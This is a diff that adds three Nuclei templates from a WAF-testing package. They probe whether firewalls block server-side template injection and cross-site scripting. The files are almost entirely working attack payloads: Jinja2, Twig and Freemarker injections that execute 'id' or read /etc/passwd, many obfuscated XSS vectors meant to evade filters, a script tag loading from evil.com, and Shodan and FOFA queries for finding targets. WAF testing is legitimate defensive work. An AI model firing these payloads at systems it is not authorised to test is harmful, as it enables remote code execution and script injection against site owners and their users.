@waftester/cli 2.8.0

package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml

@@ -0,0 +1,147 @@
+id: waf-ssti-bypass
+info:
+  name: WAF Server-Side Template Injection Bypass
+  author: waftester
+  severity: critical
+  description: |
+    Tests WAF effectiveness against server-side template injection bypass
+    techniques. Targets Jinja2, Twig, Freemarker, Velocity, Pebble, Smarty,
+    ERB, and Mako template engines. Includes filter bypass, attribute access
+    tricks, string concatenation, and namespace traversal techniques.
+  reference:
+    - https://portswigger.net/web-security/server-side-template-injection
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
+    - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: ssti,waf,bypass,owasp-a03,injection,template,waftester
+  classification:
+    cwe-id:
+      - CWE-94
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 18
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Template engine detection - mathematical expressions
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name={{7*7}}"
+      - "{{BaseURL}}/?name={{7*'7'}}"
+      - "{{BaseURL}}/?name=${7*7}"
+      - "{{BaseURL}}/?name=<%= 7*7 %>"
+      - "{{BaseURL}}/?name=#{7*7}"
+      - "{{BaseURL}}/?name=${T(java.lang.Runtime).getRuntime()}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "49"
+          - "7777777"
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+  # Jinja2 RCE via class traversal
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}"
+      - "{{BaseURL}}/?name={{''.__class__.__mro__[1].__subclasses__()}}"
+      - "{{BaseURL}}/?name={{request.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "root:"
+          - "subprocess"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Jinja2 filter bypass - attr() and bracket notation
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name={{config|attr('__class__')|attr('__init__')|attr('__globals__')}}"
+      - "{{BaseURL}}/?name={{''['__class__']['__mro__'][1]['__subclasses__']()}}"
+      - "{{BaseURL}}/?name={%set x=config.__class__.__init__.__globals__%}{{x}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Twig template engine (PHP)
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name={{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}"
+      - "{{BaseURL}}/?name={{['id']|filter('system')}}"
+      - "{{BaseURL}}/?name={{app.request.server.get('DOCUMENT_ROOT')}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Freemarker / Velocity (Java)
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name=<#assign ex='freemarker.template.utility.Execute'?new()> ${ex('id')}"
+      - "{{BaseURL}}/?name=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/xss-basic.yaml

@@ -0,0 +1,163 @@
+id: waf-xss-basic-bypass
+info:
+  name: WAF XSS Basic Bypass
+  author: waftester
+  severity: high
+  description: |
+    Tests WAF effectiveness against fundamental cross-site scripting vectors.
+    Covers reflected XSS via script tags, event handlers, protocol handlers,
+    SVG injection, and various HTML element injection techniques. Tests both
+    GET and POST parameter vectors with multiple encoding styles.
+  reference:
+    - https://owasp.org/www-community/attacks/xss/
+    - https://portswigger.net/web-security/cross-site-scripting
+    - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
+    - https://html5sec.org/
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
+  tags: xss,waf,bypass,owasp-a03,reflected,injection,waftester
+  classification:
+    cwe-id:
+      - CWE-79
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 22
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Classic script tag injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<script>alert(1)</script>"
+      - "{{BaseURL}}/?q=<script>alert(document.domain)</script>"
+      - "{{BaseURL}}/?q=<script>alert(String.fromCharCode(88,83,83))</script>"
+      - "{{BaseURL}}/?q=<script src=//evil.com/xss.js></script>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert"
+          - "<script>alert(document.domain)"
+          - "<script src="
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "<script[^>]*>.*?</script>"
+
+  # Event handler injection - common handlers
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<img src=x onerror=alert(1)>"
+      - "{{BaseURL}}/?q=<svg onload=alert(1)>"
+      - "{{BaseURL}}/?q=<body onload=alert(1)>"
+      - "{{BaseURL}}/?q=<input onfocus=alert(1) autofocus>"
+      - "{{BaseURL}}/?q=<marquee onstart=alert(1)>"
+      - "{{BaseURL}}/?q=<details open ontoggle=alert(1)>"
+      - "{{BaseURL}}/?q=<video src=x onerror=alert(1)>"
+      - "{{BaseURL}}/?q=<audio src=x onerror=alert(1)>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "onerror=alert"
+          - "onload=alert"
+          - "onfocus=alert"
+          - "onstart=alert"
+          - "ontoggle=alert"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Protocol handler injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<a href=javascript:alert(1)>click</a>"
+      - "{{BaseURL}}/?q=<iframe src=javascript:alert(1)>"
+      - "{{BaseURL}}/?q=<form action=javascript:alert(1)><input type=submit>"
+      - "{{BaseURL}}/?q=<object data=javascript:alert(1)>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "javascript:alert"
+          - "javascript:alert(1)"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # SVG and math injection vectors
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<svg><script>alert(1)</script></svg>"
+      - "{{BaseURL}}/?q=<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror=alert(1)>"
+      - "{{BaseURL}}/?q=<svg><animate onbegin=alert(1) attributeName=x dur=1s>"
+      - "{{BaseURL}}/?q=<svg><set onbegin=alert(1) attributename=x to=1>"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Exotic HTML5 elements
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<isindex type=image src=1 onerror=alert(1)>"
+      - "{{BaseURL}}/?q=<keygen autofocus onfocus=alert(1)>"
+      - "{{BaseURL}}/?q=<meter onmouseover=alert(1)>0</meter>"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/xss-evasion.yaml

@@ -0,0 +1,217 @@
+id: waf-xss-evasion-bypass
+info:
+  name: WAF XSS Evasion Techniques
+  author: waftester
+  severity: high
+  description: |
+    Tests XSS bypass using advanced evasion techniques from real-world WAF
+    bypass research. Includes HTML entity encoding, case manipulation, tag
+    mutation, event handler obfuscation, protocol tricks, template literals,
+    Function constructor abuse, DOM clobbering, SVG namespace confusion,
+    and WAF-vendor-specific XSS bypass techniques.
+  reference:
+    - https://owasp.org/www-community/attacks/xss/
+    - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
+    - https://github.com/0xInfection/Awesome-WAF
+    - https://html5sec.org/
+    - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
+  tags: xss,waf,bypass,evasion,tamper,waftester
+  classification:
+    cwe-id:
+      - CWE-79
+      - CWE-693
+      - CWE-116
+  metadata:
+    verified: true
+    max-request: 28
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # HTML entity encoding - decimal and hex
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>"
+      - "{{BaseURL}}/?q=<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&colon;alert(1)>click</a>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+  # Case manipulation and tag mutation
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<ScRiPt>alert(1)</ScRiPt>"
+      - "{{BaseURL}}/?q=<scRIPT>alert(1)</SCRIPT>"
+      - "{{BaseURL}}/?q=<IMG SRC=x ONERROR=alert(1)>"
+      - "{{BaseURL}}/?q=<iMg sRc=x oNeRrOr=alert(1)>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Exotic event handlers - uncommon handlers that bypass keyword filters
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<body style=height:1000px onwheel=alert(1)>"
+      - "{{BaseURL}}/?q=<div onpointerover=alert(1)>hover</div>"
+      - "{{BaseURL}}/?q=<div onauxclick=alert(1)>click</div>"
+      - "{{BaseURL}}/?q=<div ondragstart=alert(1) draggable=true>drag</div>"
+      - "{{BaseURL}}/?q=<div onanimationend=alert(1) style=animation-name:x>"
+      - "{{BaseURL}}/?q=<div ontransitionend=alert(1) style=transition:1s>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # JavaScript alternative invocation - bracket notation, template literals
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<img src=x onerror=window['alert'](1)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=self['alert'](1)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=parent['alert'](1)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=top['al'%2B'ert'](1)>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Protocol obfuscation - whitespace and encoding in javascript: URIs
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<a href='jav%0Dascript:alert(1)'>click</a>"
+      - "{{BaseURL}}/?q=<a href='java%09script:alert(1)'>click</a>"
+      - "{{BaseURL}}/?q=<a href='java%0ascript:alert(1)'>click</a>"
+      - "{{BaseURL}}/?q=<a href='j%00avascript:alert(1)'>click</a>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # SVG-based evasion
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<svg/onload=alert(String.fromCharCode(49))>"
+      - "{{BaseURL}}/?q=<svg><desc><![CDATA[</desc><script>alert(1)</script>]]>"
+      - "{{BaseURL}}/?q=<svg><foreignObject><body onload=alert(1)>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Double encoding
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E"
+      - "{{BaseURL}}/?q=%253Csvg%2520onload%253Dalert(1)%253E"
+      - "{{BaseURL}}/?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Function constructor and eval alternatives
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<img src=x onerror=Function('al'%2b'ert(1)')()>"
+      - "{{BaseURL}}/?q=<img src=x onerror=setTimeout('alert(1)',0)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=setInterval('alert(1)',1000)>"
+      - "{{BaseURL}}/?q=<img src=x onerror=[].constructor.constructor('alert(1)')()>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Null byte and comment injection
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=<scri%00pt>alert(1)</scri%00pt>"
+      - "{{BaseURL}}/?q=<script>al/**/ert(1)</script>"
+      - "{{BaseURL}}/?q=<script>/*<![CDATA[*/alert(1)/*]]>*/</script>"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or